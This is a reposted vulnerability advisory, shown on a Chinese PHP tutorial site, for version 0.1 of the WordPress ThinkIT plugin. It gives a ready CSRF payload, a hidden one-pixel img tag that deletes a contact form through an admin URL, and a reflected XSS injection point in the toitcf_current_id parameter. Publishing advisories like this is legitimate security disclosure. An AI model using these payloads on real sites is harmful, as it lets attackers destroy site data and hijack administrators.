来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] ############################################################ 标题: Wordpress ThinkIT plugin - CSRF / XSS# 发现者: Yashar shahinzadeh# 官网: http://thinkoverit.com/# 测试环境: Linux ......
########################################################### # 标题: Wordpress ThinkIT plugin - CSRF / XSS # 发现者: Yashar shahinzadeh # 官网: http://thinkoverit.com/ # 测试环境: Linux & Windows, PHP 5.2.9 # 影响版本: 0.1 ################################################################ 摘要 ======== 1. CSRF - Delete a form 2. Cross site scripting 1. CSRF - Delete a form: ======================== Contact form ID can be easily understood from HTML page source, <input type="hidden" value="[ID]" name="toit-form-id"></input>, which [ID] is the form ID, following crafted exploit may be used so as to delete form completely: <img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1"> Obviously, ID must be replaced. 2. Cross site scripting: ======================== http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf /** Yasshar shahinzadeh **/
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
